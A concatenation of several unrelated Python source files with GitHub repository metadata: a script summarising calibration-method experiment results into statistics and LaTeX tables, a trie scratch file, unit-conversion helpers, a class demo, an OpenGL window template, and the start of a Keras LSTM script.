df['method'] = df['method'].replace(to_replace=key, value=value,
regex=True)
# Names for final version
if reduced_names:
final_names = dict(
dir_fix_diag='TempS',
temperature_scaling='TempS',
vector_scaling='VecS',
uncal='Uncal',
ovr_dir_full='Beta',
bin_freq='FreqB',
bin_width='WidthB',
dir_full_l2='DirL2',
isotonic='Isot',
dir_full='Dir',
mlr_log='MultLogRegL2',
ovr_dir_full_l2='BetaL2',
ovr_mlr_log='LogRegL2',
dir_odir_l2='DirODIR',
temperature_scaling_noref='TempSNoref',
vector_scaling_noref='VecSNoref',
dir_odir_l2_noref='DirODIRNoref',
dir_full_noref='DirNoref',
dir_full_l2_noref='DirL2Noref',
)
new_order = ['Uncal', 'DirL2', 'DirL2Noref', 'DirODIR', 'DirODIRNoref',
'Beta', 'TempS', 'TempSNoref', 'VecS', 'VecSNoref',
'Isot', 'FreqB', 'WidthB']
else:
final_names = dict(
dir_fix_diag='Temp_Scaling',
temperature_scaling='Temp_Scaling',
vector_scaling='Vect_Scaling',
uncal='Uncalibrated',
ovr_dir_full='OvR_Beta',
bin_freq='OvR_Freq_Bin',
bin_width='OvR_Width_Bin',
dir_full_l2='Dirichlet_L2',
isotonic='OvR_Isotonic',
dir_full='Dirichlet',
mlr_log='Log_Reg_L2',
ovr_dir_full_l2='OvR_Beta_L2',
ovr_mlr_log='OvR_Log_Reg_L2',
dir_odir_l2='Dirichlet_ODIR')
for key, value in final_names.items():
df['method'] = df['method'].replace(to_replace=key, value=value,
regex=False)
new_order = [method for method in new_order if method in
df['method'].unique()]
dataset_names = df['dataset'].unique()
classifiers = df['classifier'].unique()
measures_list = ['acc', 'loss', 'brier', 'conf-ece', 'cw-ece', 'full-ece',
'p-conf-ece', 'p-cw-ece', 'p-full-ece', 'mce']
measures_list = [measure for measure in measures_list if measure in df.columns]
# Assert that all experiments have finished
for column in ['method', 'classifier']:
for measure in measures_list:
df_count = df.pivot_table(index=['dataset'], columns=[column],
values=[measure], aggfunc='count')
file_basename = os.path.join(summary_path,
'results_count_{}_{}'.format(column,
measure))
df_to_heatmap(df_count, file_basename + '.svg',
title='Results count finite ' + measure, cmap='Greys_r')
# Export summary of datasets
(df[['dataset', 'n_samples', 'n_features', 'n_classes']]
.drop_duplicates()
.set_index('dataset')
.sort_index()
.to_latex(os.path.join(summary_path, 'datasets.tex')))
if hyperparameters:
print('Generating summary of hyperparameters')
summarise_hyperparameters(df, summary_path)
if confusion_matrices:
print('Generating summary of confusion matrices')
summarise_confusion_matrices(df, summary_path)
measures_list = (('acc', True), ('loss', False), ('brier', False),
('conf-ece', False), ('cw-ece', False),
('full-ece', False), ('p-conf-ece', True),
('p-cw-ece', True), ('p-full-ece', True),
('mce', False), ('exec_time', False),
#('train_acc', True), ('train_loss', False),
#('train_brier', False), ('train_conf-ece', False),
#('train_cw-ece', False), ('train_full-ece', False),
#('train_mce', False)
)
measures_list = [(key, value) for key, value in measures_list if key in
df.columns]
for measure, max_is_better in measures_list:
print('# Measure = {}'.format(measure))
if 'train_' not in measure:
filename = os.path.join(summary_path,
'n_samples_scatter')
export_dataset_analysis(df, measure, filename)
table = df.pivot_table(index=['classifier'], columns=['method'],
values=[measure], aggfunc=[np.mean, np.std])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
str_table = rankings_to_latex(classifiers, table, precision=2,
table_size=table_size, max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on different classifiers ' +
'with the mean measure={}'
).format(measure),
label='table:mean:{}'.format(measure))
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
'classifier'], columns=['method'],
values=[measure], aggfunc=[len])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
try:
assert(np.alltrue(table.values == 1))
except AssertionError as e:
print(e)
if 'train_' not in measure:
# Export the Mean performance of each method
table = df.pivot_table(index=['dataset', 'classifier', 'n_classes',
'n_samples'],
columns=['method'],
values=[measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table.columns = table.columns.droplevel()
table.to_csv(os.path.join(summary_path, measure + '.csv'))
# Print correlation results
method = 'spearman' # for non-linear ranking correlations
#method = 'pearson' # for linear ranking correlations
print('\n{} correlation for the measure {}'.format(method, measure))
corr_test = table.reset_index(level=['n_classes', 'n_samples']).corr(method=method)
print(corr_test)
if ('train_' + measure) in [m[0] for m in measures_list]:
table = df.pivot_table(index=['dataset', 'classifier', 'n_classes',
'n_samples'],
columns=['method'],
values=['train_' + measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table.columns = table.columns.droplevel()
table.to_csv(os.path.join(summary_path, 'train_' + measure + '.csv'))
print('\n{} correlation for the measure {}'.format(method, 'train_' + measure))
corr_train = table.reset_index(level=['n_classes', 'n_samples']).corr(method=method)
print(corr_train)
print('\n{} correlation difference of test - training for the measure {}'.format(method, measure))
print(corr_test - corr_train)
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
'classifier'], columns=['method'],
values=[measure])
cmap = pyplot.get_cmap('tab20')
if measure.startswith('p-'):
_p_table_nonan = table.dropna(axis=0)
_p_table = (_p_table_nonan > 0.05).mean(axis=0)
_p_table.sort_values(ascending=max_is_better, inplace=True)
_p_table.reset_index(level=0, drop=True, inplace=True)
filename = os.path.join(summary_path,
'p_table_calibrators_{}'.format(measure))
_p_table.to_latex(filename + '.tex')
fig = pyplot.figure(figsize=(4, 3))
ax = fig.add_subplot(111)
_p_table.plot(kind='barh', ax=ax, title=None, # '{} > 0.05'.format(measure),
zorder=2, color=cmap(_p_table.index.argsort().argsort()))
ax.grid(zorder=0)
ax.set_xlabel('Proportion (out of {})'.format(_p_table_nonan.shape[0]))
pyplot.tight_layout()
pyplot.savefig(filename + '.svg')
pyplot.close(fig)
print('Percentage of finite results per calibrator')
print(np.isfinite(table.values).mean(axis=0))
# Wilcoxon rank-sum test two-tailed
df_ranksums = compute_ranksums(table)
filename = os.path.join(summary_path,
'ranksum_pvalues_{}.tex'.format(measure))
threshold = 0.005
export_statistic_to_latex(df_ranksums, filename, threshold=threshold,
caption=('Wilcoxon rank-sum test statistic '
'for every paired method for the '
'measure of {}. Statistic is bold '
'when p-value is smaller than '
'{}').format(measure, threshold),
label='tab:ranksum:{}'.format(measure)
)
# Mann-Whitney rank test one-sided alternative is first is smaller than
df_mannwhitneyu = compute_mannwhitneyu(table)
filename = os.path.join(summary_path,
'mannwhitneyu_pvalues_{}.tex'.format(measure))
export_statistic_to_latex(df_mannwhitneyu, filename, threshold=threshold,
caption=('Mann-Whitney U test statistic '
'one sided with alternative '
'hypothesis the method in row i '
'is less than the method in column j '
'for every pair of methods for the '
'measure of {}. Statistic is bold '
'when the p-value is smaller than '
'{}').format(measure, threshold),
label='tab:mannwhitney:{}'.format(measure),
str_format='%1.1e'
)
ranking_table = np.zeros((len(classifiers),
df.method.unique().shape[0]))
measure_table = np.zeros((len(classifiers),
df.method.unique().shape[0]))
num_datasets = np.zeros(len(classifiers), dtype='int')
for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure],
aggfunc=[np.mean, np.std])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
# Perform a Friedman statistic test
# Remove datasets in which one of the experiments failed
ftest = compute_friedmanchisquare(table['mean'])
print(ftest)
str_table = rankings_to_latex(dataset_names, table, precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on the classifier ' +
'{} with the measure={}' +
'(Friedman statistic test ' +
'= {:.2E}, p-value = {:.2E})'
).format(classifier_name, measure,
ftest.statistic, ftest.pvalue),
label='table:{}:{}'.format(classifier_name,
measure),
add_std=False)
file_basename = os.path.join(summary_path, classifier_name +
'_dataset_vs_method_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
df_to_heatmap(table['mean'][measure], file_basename + '.svg',
title=measure)
df_to_heatmap(table['mean'][measure], file_basename + '_rows.svg',
title='Normalised rows for ' + measure,
normalise_rows=True)
#for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure],
aggfunc=[np.mean, np.std])
# Remove datasets in which one of the experiments failed
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table = table[~table.isna().any(axis=1)]
if max_is_better:
table *= -1
measure_table[i] = table['mean'].mean()
ranking_table[i] = table['mean'].apply(rankdata, axis=1).mean()
num_datasets[i] = len(table)
filename = os.path.join(summary_path, 'crit_diff_' +
classifier_name + '_' +
measure + '.pdf')
print(('Critical Difference computed with avranks of shape {} ' +
'for {} datasets').format(np.shape(ranking_table[i]),
table.shape[0]))
export_critical_difference(avranks=ranking_table[i],
num_datasets=table.shape[0],
names=table.columns.levels[2],
filename=filename,
title='(p-value = {:.2e}, #D = {})'.format(ftest.pvalue, table.shape[0]))
## 1.1. Export the summary of all rankings
df_mean_rankings = pd.DataFrame(ranking_table, index=classifiers,
columns=table.columns.levels[2])
df_mean_measures = pd.DataFrame(measure_table, index=classifiers,
columns=table.columns.levels[2])
if max_is_better:
df_mean_measures *= -1
## --------------------------------------------------------------##
## Version 2 for the aggregated rankings
# Perform rankings of dataset+classifier vs calibration method
table = df.pivot_table(index=['dataset', 'classifier'],
columns=['method'],
values=[measure], aggfunc=np.mean)
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
# Remove datasets and classifier combinations in which one of the experiments failed
table = table[~table.isna().any(axis=1)]
if max_is_better:
table *= -1
ranking_table_all = table.apply(rankdata, axis=1).mean()
ftest = compute_friedmanchisquare(table)
print('Friedman test on the full table of shape {}'.format(
np.shape(table)))
print(ftest)
print(('Critical Difference V.2 computed with avranks of shape {} for' +
'{} datasets').format(np.shape(ranking_table_all),
len(table)))
export_critical_difference(avranks=ranking_table_all,
num_datasets=len(table),
names=table.columns.levels[1],
filename=os.path.join(summary_path,
'crit_diff_' +
measure + '_v2.pdf'),
title='(p-value = {:.2e}, #D = {})'.format(ftest.pvalue, len(table)))
## End Version 2 for the aggregated rankings
## --------------------------------------------------------------##
## 1.2. Export the summary of all rankings
# TODO check that performing the ranking of the rankings is appropriate
print('Average rankings shape = {}'.format(ranking_table_all.shape))
print('Average rankings = {}'.format(ranking_table_all))
#df_mean_rankings.rename(reduced_names, axis='columns', inplace=True)
#df_mean_rankings = df_mean_rankings[new_order]
df_mean_rankings.sort_index(inplace=True)
str_table = rankings_to_latex(df_mean_rankings.index, df_mean_rankings,
precision=1, table_size=table_size,
max_is_better=False,
caption=('Ranking of calibration methods ' +
'for {} (Friedman\'s test significant ' +
'with p-value {:.2e}'
).format(measure, ftest.pvalue),
label='table:{}'.format(measure),
add_std=False,
column_names=df_mean_rankings.columns,
avg_ranks=ranking_table_all, add_rank=False)
file_basename = os.path.join(summary_path,
'{}_rankings'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# First version of table with the average measures
measure_table_all = df_mean_measures.mean(axis=0)
print('Average measures = {}'.format(df_mean_measures))
str_table = rankings_to_latex(classifiers, df_mean_measures,
precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied to each classifier ' +
'with the measure={}'
).format(measure),
label='table:{}'.format(measure),
add_std=False,
column_names=measure_table_all.index,
avg_ranks=measure_table_all, add_rank=True)
file_basename = os.path.join(summary_path,
'{}_average'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# Create effect size measures
ave_relative = np.zeros((len(classifiers),
df.method.unique().shape[0]))
for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
uncal_measure = table[(measure, 'Uncal')]
table_values = (table.values -
uncal_measure.values.reshape(-1,1)
)/uncal_measure.values.reshape(-1,1)
table.iloc[:,:] = table_values
str_table = rankings_to_latex(table.index, table, precision=3,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on the classifier ' +
'{} with the relative measure={}'
).format(classifier_name, measure),
label='table:rel:{}:{}'.format(classifier_name,
measure),
column_names=table.columns.levels[1],
add_std=False)
file_basename = os.path.join(summary_path, classifier_name +
'_dataset_vs_method_relative_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
ave_relative[i] = table.mean(axis=0)
df_ave_relative = pd.DataFrame(ave_relative, index=classifiers,
columns=table.columns.levels[1])
# First version of table with the average measures
ave_relative_all = df_ave_relative.mean(axis=0)
print('Average measures = {}'.format(ave_relative_all))
str_table = rankings_to_latex(classifiers, df_ave_relative,
precision=3,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied to each classifier ' +
'with the relative measure={}'
).format(measure),
label='table:rel:{}'.format(measure),
add_std=False,
column_names=df_ave_relative.columns,
avg_ranks=ave_relative_all, add_rank=True)
file_basename = os.path.join(summary_path,
'{}_rel_average'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# Answering rebuttal
base_name = 'Uncal'
for measure, max_is_better in measures_list:
table = df.pivot_table(index=['dataset', 'classifier', 'mc'],
columns=['method'], values=[measure],
)
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
if measure == 'acc':
table = 1 - table
base_measure = table[(measure, base_name)]
table_values = 100*(table.values -
base_measure.values.reshape(-1,1)
)/base_measure.values.reshape(-1,1)
table.iloc[:,:] = table_values
#relative_improvement = table[(measure, 'Dirichlet_L2')].agg(['min', 'max', 'mean', 'median'])
#print(measure)
relative_improvement = table.agg(['min', 'max', 'mean', 'median'])
print(relative_improvement)
relative_improvement.to_latex(os.path.join(summary_path,
'{}_relative_statistics.tex'.format(measure)))
for classifier_name in classifiers:
table = df.pivot_table(values=[key for key, value in measures_list],
index=['dataset', 'method'],
aggfunc=[np.mean, np.std])
table.sort_index(inplace=True)
table.to_csv(os.path.join(summary_path, classifier_name + '_main_results.csv'))
table.to_latex(os.path.join(summary_path, classifier_name + '_main_results.tex'))
def generate_classifier_summaries(df, summary_path, table_size='small'):
# Change name of metrics
df.rename({'guo-ece': 'conf-ece', 'p-guo-ece': 'p-conf-ece',
'train_guo-ece': 'train_conf-ece',
'cla-ece': 'cw-ece', 'p-cla-ece': 'p-cw-ece',
'train_cla-ece': 'train_cw-ece'},
axis='columns', inplace=True)
dataset_names = df['dataset'].unique()
classifiers = df['classifier'].unique()
df = df[df.method == 'uncalibrated']
measures_list = ['acc', 'loss', 'brier', 'conf-ece', 'cw-ece', 'full-ece',
'p-conf-ece', 'p-cw-ece', 'p-full-ece', 'mce']
measures_list = [measure for measure in measures_list if measure in df.columns]
measures_list = (('acc', True), ('loss', False), ('brier', False),
('conf-ece', False), ('cw-ece', False),
('full-ece', False), ('p-conf-ece', True),
('p-cw-ece', True), ('p-full-ece', True),
('mce', False), ('train_acc', True),
('train_loss', False), ('train_brier', False),
('exec_time', False), ('train_conf-ece', False),
('train_cw-ece', False), ('train_full-ece', False),
('train_mce', False), ('exec_time', False))
measures_list = [(key, value) for key, value in measures_list if key in
df.columns]
for measure, max_is_better in measures_list:
print('# Measure = {}'.format(measure))
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
], columns=['classifier'],
values=[measure])
cmap = pyplot.get_cmap('tab20')
if measure.startswith('p-'):
_p_table_nonan = table.dropna(axis=0)
_p_table = (_p_table_nonan > 0.05).mean(axis=0)
_p_table.sort_values(ascending=max_is_better, inplace=True)
_p_table.reset_index(level=0, drop=True, inplace=True)
filename = os.path.join(summary_path,
'p_table_classifiers_{}'.format(measure))
_p_table.to_latex(filename + '.tex')
fig = pyplot.figure(figsize=(4, 3))
ax = fig.add_subplot(111)
_p_table.plot(kind='barh', ax=ax, title=None, #'{} > 0.05'.format(measure),
zorder=2, color=cmap(_p_table.index.argsort().argsort()))
ax.grid(zorder=0)
ax.set_xlabel('Proportion (out of {})'.format(_p_table_nonan.shape[0]))
pyplot.tight_layout()
pyplot.savefig(filename + '.svg')
pyplot.close(fig)
print('Percentage of finite results per classifier')
print(np.isfinite(table.values).mean(axis=0))
# Wilcoxon rank-sum test two-tailed
df_ranksums = compute_ranksums(table)
filename = os.path.join(summary_path,
'classifiers_ranksum_pvalues_{}.tex'.format(measure))
threshold = 0.005
export_statistic_to_latex(df_ranksums, filename, threshold=threshold,
caption=('Wilcoxon rank-sum test statistic '
'for every paired uncalibrated '
'classifier for the '
'measure of {}. Statistic is bold '
'when p-value is smaller than '
'{}').format(measure, threshold),
label='tab:ranksum:{}'.format(measure)
)
# Mann-Whitney rank test one-sided alternative is first is smaller than
df_mannwhitneyu = compute_mannwhitneyu(table)
filename = os.path.join(summary_path,
'classifiers_mannwhitneyu_pvalues_{}.tex'.format(measure))
export_statistic_to_latex(df_mannwhitneyu, filename, threshold=threshold,
caption=('Mann-Whitney U test statistic '
'one sided with alternative '
'hypothesis the classifier in row i '
'is less than the classifier in column j '
'for every pair of uncalibrated '
'classifiers for the '
'measure of {}. Statistic is bold '
'when the p-value is smaller than '
'{}').format(measure, threshold),
label='tab:mannwhitney:{}'.format(measure),
str_format='%1.1e'
)
table = df.pivot_table(index=['dataset'], columns=['classifier'],
values=[measure], aggfunc=[np.mean, np.std])
table = table[~table.isna().any(axis=1)]
ftest = compute_friedmanchisquare(table['mean'])
print(ftest)
str_table = rankings_to_latex(dataset_names, table, precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of uncalibrated classifiers ' +
'with the measure={}' +
'(Friedman statistic test ' +
'= {:.2E}, p-value = {:.2E})'
).format(measure,
ftest.statistic, ftest.pvalue),
label='table:{}:{}'.format('uncal', measure),
add_std=False)
file_basename = os.path.join(summary_path,
'dataset_vs_classifier_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
if max_is_better:
table *= -1
ranking_table = table['mean'].apply(rankdata, axis=1).mean()
filename = os.path.join(summary_path, 'crit_diff_' +
'uncal_classifiers' + '_' +
measure + '.pdf')
print(('Critical Difference computed with avranks of shape {} ' +
'for {} datasets').format(np.shape(ranking_table),
table.shape[0]))
try:
export_critical_difference(avranks=ranking_table,
num_datasets=table.shape[0],
names=table.columns.levels[2],
filename=filename,
title='(p-value = {:.2e}, #D = {})'.format(
ftest.pvalue, table.shape[0]))
except ZeroDivisionError as e:
print(e)
def generate_summary_hist(df, summary_path):
file_basename = os.path.join(summary_path, 'scores_histogram')
df = df.sort_index()
df_to_heatmap(df, file_basename + '.svg', title='Mean score histograms',
normalise_rows=True)
for classifier in df.index.levels[1]:
df_to_heatmap(df.loc[(slice(None), [classifier]),
:].reset_index(level='classifier', drop=True),
file_basename + '_' + classifier + '.svg',
title='Mean score histograms ' + classifier,
normalise_rows=True)
|
[
"perello.nieto@gmail.com"
] |
perello.nieto@gmail.com
|
8f6d16bbfe84dd5df87370eb683744f95b71f11f
|
e7ae54a18f187cb7539a0b2a134fe93e9afcbbe0
|
/notebooks/scratch_trie_with_attrs.py
|
e64c734c6432a181c406a9775a3d231168cb8116
|
[
"MIT"
] |
permissive
|
hdmamin/htools
|
b212f6dd3a910ad23de694e4202f9f513c8db52f
|
3905b46e9ed713dcd753108bee0eeb05b8a18aa4
|
refs/heads/master
| 2023-05-12T02:26:29.931781
| 2023-04-27T05:17:25
| 2023-04-27T05:17:25
| 177,682,148
| 1
| 1
|
MIT
| 2020-03-30T17:28:42
| 2019-03-25T23:49:36
|
Python
|
UTF-8
|
Python
| false
| false
| 3,442
|
py
|
"""
Want to eventually add support for trie with word-level and maybe char-level
attributes. Ex: word embeddings, word frequencies, char->char transition probs,
parts of speech, etc.). Also experimenting with a slightly different interface
than the existing trie in htools. Note that names are the same so if you import
htools * in a notebook, things may get confusing. Might want to rename these.
"""
from htools.core import listlike
class TrieNode:
def __init__(self, edges=None, is_terminal=False, is_root=False, **kwargs):
self.edges = edges or {}
self.is_terminal = is_terminal
self.is_root = is_root
self.kwarg_names = set(kwargs)
self.set_kwargs(**kwargs)
def set_kwargs(self, **kwargs):
self.kwarg_names.update(kwargs.keys())
self.__dict__.update(**kwargs)
def __contains__(self, char):
return char in self.edges
def __getitem__(self, char):
return self.edges[char]
def __setitem__(self, char, val):
self.edges[char] = val
def __repr__(self):
res = f'TrieNode(edges={list(self.edges)}, '\
f'is_terminal={self.is_terminal}, ' \
f'is_root={self.is_root}'
if self.kwarg_names:
kwarg_str = ', '.join(f'{kwarg}={getattr(self, kwarg)}'
for kwarg in self.kwarg_names)
res += ', ' + kwarg_str
return res + ')'
class Trie:
def __init__(self, vocab=None):
self.root = TrieNode(is_root=True)
self._initialize(vocab)
def _initialize(self, vocab):
# Case 1: vocab is list/tuple. Must assign empty kwargs.
if listlike(vocab):
vocab = {word: {} for word in vocab}
# Case 2: vocab is dict but values are not dicts. Must assign default name.
elif not isinstance(next(iter(vocab.values())), dict):
vocab = {word: {'val': val} for word, val in vocab.items()}
for word, kwargs in vocab.items():
self.add(word, **kwargs)
def add(self, word, **kwargs):
# These kwargs are associated with the whole word, e.g. if you want to
# pass in word counts or word embeddings. Still need to implement support
# for character-level attributes if I want that (e.g. if we want some kind of
# transition probability from 1 character to the next).
node = self.root
for char in word:
if char not in node:
node[char] = TrieNode()
node = node[char]
node.is_terminal = True
node.set_kwargs(**kwargs)
def update(self, words):
for word in words:
self.add(word)
# TODO - eventually want method that yields nodes as we add/search for a new
# word. Based on my coroutine/generator pattern. Still debugging.
def _find(self, word):
node = self.root
yield
for char in word:
cur = yield node
print('1', 'cur', cur, 'node', node)
if cur:
node = cur.get(char)
print('2', 'cur', cur, 'node', node)
if __name__ == '__main__':
word_dict = {
'app': 18,
'a': 6,
'apple': 17,
'about': 4,
'able': 6,
'zoo': 13,
'zen': 11,
'zesty': 14,
'apply': 4,
'cow': 18,
'zigzag': 12
}
t = Trie(word_dict)
coro = _find(t, 'app')
print(next(coro))
for x in coro:
coro.send(x)
|
[
"hmamin2@dons.usfca.edu"
] |
hmamin2@dons.usfca.edu
|
35431caf74211b4c9fb9a864dc2341bb7c26cefa
|
d3902ba47e145a814117f588f0aba26ba49cc0bb
|
/osrm/utils.py
|
bd0cdc70c79b9659e73b75d7705d797c5df11c74
|
[
"MIT"
] |
permissive
|
ecotner/osrm-api
|
bff3c9da8d2ab379c0f19772bc65509dc5705d4a
|
1607a0ccdac0b507b2b892ced78f6af8a7b33a5d
|
refs/heads/main
| 2023-01-10T18:43:27.623327
| 2020-11-08T20:50:41
| 2020-11-08T20:50:41
| 310,964,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 807
|
py
|
# conversions from other unit to meters
DIST_CONVERSIONS = {
"m": 1.0,
"meter": 1.0,
"km": 1000.0,
"kilometer": 1000.0,
"mi": 1609.34,
"mile": 1609.34,
"foot": 0.3048,
"ft": 0.3048,
}
# conversions from other unit to seconds
TIME_CONVERSIONS = {
"s": 1.0,
"sec": 1.0,
"second": 1.0,
"m": 60.0,
"min": 60.0,
"minute": 60.0,
"hour": 3600.0,
"hr": 3600.0,
"h": 3600.0,
"day": 24 * 3600.0,
"d": 24 * 3600.0,
}
# this is the "mean polar radius"
EARTH_RADIUS_KM = 6371.0
def convert_dist_units(qty, like="meter", to="km"):
qty = (qty * DIST_CONVERSIONS[like]) / DIST_CONVERSIONS[to]
return qty
def convert_time_units(qty, like="sec", to="min"):
qty = (qty * TIME_CONVERSIONS[like]) / TIME_CONVERSIONS[to]
return qty
|
[
"2.71828cotner@gmail.com"
] |
2.71828cotner@gmail.com
|
ec32a036831fdab1872f15cd6d75526fec6d9151
|
8a025c88c554c782885ccf780faf7af51f8d2583
|
/OPP1/第七章/attribute_critter.py
|
250670abc900ab0ed774ea1ec31cbe30cefc3df8
|
[] |
no_license
|
LIGHT1213/PythonStudy
|
cc97a6372d5347229d014fa7fa499ac6af1abd2c
|
b3ac29777e395dee1282d9d422f1f6556cc2b3f6
|
refs/heads/master
| 2020-04-08T14:17:08.773627
| 2018-12-19T10:32:17
| 2018-12-19T10:32:17
| 159,430,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
# Attribute Critter
# Demonstrates creating and accessing object attributes
class Critter(object):
"""A virtual pet"""
def __init__(self, name):
print("A new critter has been born!")
self.name = name
def __str__(self):
rep = "Critter object\n"
rep += "name: " + self.name + "\n"
return rep
def talk(self):
print("Hi. I'm", self.name, "\n")
# main
crit1 = Critter("Poochie")
crit1.talk()
crit2 = Critter("Randolph")
crit2.talk()
print("Printing crit1:")
print(crit2)
crit1.name='anyway'
print("Directly accessing crit1.name:")
print(crit1.name)
input("\n\nPress the enter key to exit.")
|
[
"pch19980807@gmail.com"
] |
pch19980807@gmail.com
|
05178c520e2297e124911065079f0a33449649a3
|
0ec57662afc11226cba79945d11c1a1c46291653
|
/r2d2/chat_conf.py
|
1984267220a12c59f4af400d55b8fe95f05fb152
|
[] |
no_license
|
rudeak/r2d2
|
3fdb6462b35704d89507750de8140bc31b32c1c8
|
7a821fd92fdf742f529923f5b4a5c6b9ec71f429
|
refs/heads/master
| 2021-08-26T09:11:43.605522
| 2017-11-22T18:17:00
| 2017-11-22T18:17:00
| 111,716,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
def max_anagram(bot, msg, db):
cursor = db.cursor()
s = msg['text']
s = s[s.rindex(' '):]
bot.sendMessage(msg['chat']['id'], s)
|
[
"rudeak@gmail.com"
] |
rudeak@gmail.com
|
e1d148caa0658caacdd4b167e3de28a3dbcb7a98
|
382f4ac6b926ff67caef6d4dcb3a6f42f89f5e17
|
/plantilla/PlantillaOpenGL.py
|
7385416d19a4dfd18d935dfc31916486d82f4f55
|
[] |
no_license
|
JenniD5/OpenGL_2021
|
92edeb50a3e55ddfd7e94da717dca76a03fa55de
|
4908032a92df43f8d6fc37876ba53d9ef5626c4a
|
refs/heads/main
| 2023-03-27T04:53:44.456894
| 2021-03-23T00:58:21
| 2021-03-23T00:58:21
| 331,414,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,914
|
py
|
from OpenGL.GL import *
from glew_wish import *
import glfw
def dibujar():
#rutinas de dibujo
glBegin(GL_TRIANGLES)
glEnd()
def main():
#inicia glfw
if not glfw.init():
return
#crea la ventana,
# independientemente del SO que usemos
window = glfw.create_window(800,600,"Mi ventana", None, None)
#Configuramos OpenGL
glfw.window_hint(glfw.SAMPLES, 4)
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR,3)
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR,3)
glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)
glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
#Validamos que se cree la ventana
if not window:
glfw.terminate()
return
#Establecemos el contexto
glfw.make_context_current(window)
#Activamos la validación de
# funciones modernas de OpenGL
glewExperimental = True
#Inicializar GLEW
if glewInit() != GLEW_OK:
print("No se pudo inicializar GLEW")
return
#Obtenemos versiones de OpenGL y Shaders
version = glGetString(GL_VERSION)
print(version)
version_shaders = glGetString(GL_SHADING_LANGUAGE_VERSION)
print(version_shaders)
while not glfw.window_should_close(window):
#Establece regiond e dibujo
glViewport(0,0,800,600)
#Establece color de borrado
glClearColor(0.4,0.8,0.1,1)
#Borra el contenido de la ventana
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
#Dibujar
dibujar()
#Preguntar si hubo entradas de perifericos
#(Teclado, mouse, game pad, etc.)
glfw.poll_events()
#Intercambia los buffers
glfw.swap_buffers(window)
#Se destruye la ventana para liberar memoria
glfw.destroy_window(window)
#Termina los procesos que inició glfw.init
glfw.terminate()
if __name__ == "__main__":
main()
|
[
"elizabethduran0105@gmail.com"
] |
elizabethduran0105@gmail.com
|
507f90af98c2413e61c6c3d89b3dc702537d22d1
|
0689512293c47123f0e880fd903a695684680857
|
/experiment_code/lstm_m3.py
|
2cc452d6adce419503241087669bf04a5cfd2c89
|
[] |
no_license
|
oldregan/aml_final_project
|
a2628681f8dd23c1ca96a851f54e9f99b00bdfcb
|
cfb49549c8aa84f854e5d280fa618713b94721c9
|
refs/heads/master
| 2021-01-25T10:21:32.898292
| 2018-02-28T22:21:31
| 2018-02-28T22:21:31
| 123,348,966
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,243
|
py
|
import numpy as np
import tensorflow as tf
import keras as kr
import pandas as pd
from sklearn.model_selection import train_test_split
# load keras packages
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.layers import Conv2D
from keras.layers import MaxPooling1D, LSTM, BatchNormalization, GlobalAveragePooling1D
from keras.datasets import imdb
from keras import optimizers
from keras.callbacks import TensorBoard
from keras import backend as K
def r2_keras(y_true, y_pred):
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return (1 - SS_res / (SS_tot + K.epsilon()))
# unzip all the data into futuredata folder
futuredata = pd.read_csv('futuredata/beanpulp_day.csv')
window_width = 30
len_horizon = 3
stride = 3
batch_size = 300
epochs = 1000
filters = 20
kernel_size = 4
x_all = []
y_all = []
for i in range(0, futuredata.shape[0] - window_width - len_horizon, stride):
# for i in range(0, 100, stride):
